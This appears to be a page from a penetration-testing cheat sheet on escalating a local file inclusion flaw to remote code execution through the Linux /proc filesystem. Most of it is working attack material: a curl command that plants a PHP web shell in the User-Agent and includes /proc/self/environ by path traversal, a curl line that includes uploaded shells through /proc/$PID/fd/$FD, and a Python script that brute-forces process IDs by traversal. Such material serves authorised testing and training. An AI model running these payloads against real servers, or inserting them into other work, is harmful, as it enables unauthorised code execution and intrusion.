/proc

Theory

/proc is very special in that it is also a virtual filesystem. It's sometimes referred to as a process information pseudo-file system. It doesn't contain 'real' files but runtime system information (e.g. system memory, devices mounted, hardware configuration, etc).

We may use it to gain remote code execution using a LFI vulnerability

Practice

Like a log file, send the payload in the User-Agent, it may be reflected inside the /proc/self/environ file

# Sending a request to $URL with a malicious user-agent
# Accessing the payload via LFI
curl --user-agent "<?php passthru(\$_GET['cmd']); ?>" $URL/?parameter=../../../proc/self/environ

If you can upload files but don't where they are located on the disk, you may use this method.

Upload a lot of shells (for example : 100), and then include the /proc/$PID/fd/$FD in your LFI:

# Accessing the payload via LFI
curl $URL?page=/proc/$PID/fd/$FD?cmd=id

You can brute force PID using this script, the adapt it to brute force FD

import requests
import re

print("Running: ") 
for x in range(0,10000):

	url = "http://vulnerable.website/../../../../../../proc/"+ str(x) +"/cmdline"
	r = requests.get(url)
	length_of_resp = len(r.content)
	content = r.content
	
	if (length_of_resp > 150):
		print("FOUND PROCESS") 
		print("URL:" + r.url) 	
		print("Length:" + str(length_of_resp))
		print("Result:", re.split("/cmdline/" , str(content) ) )
		print("#####################################\n")

Last updated 1 year ago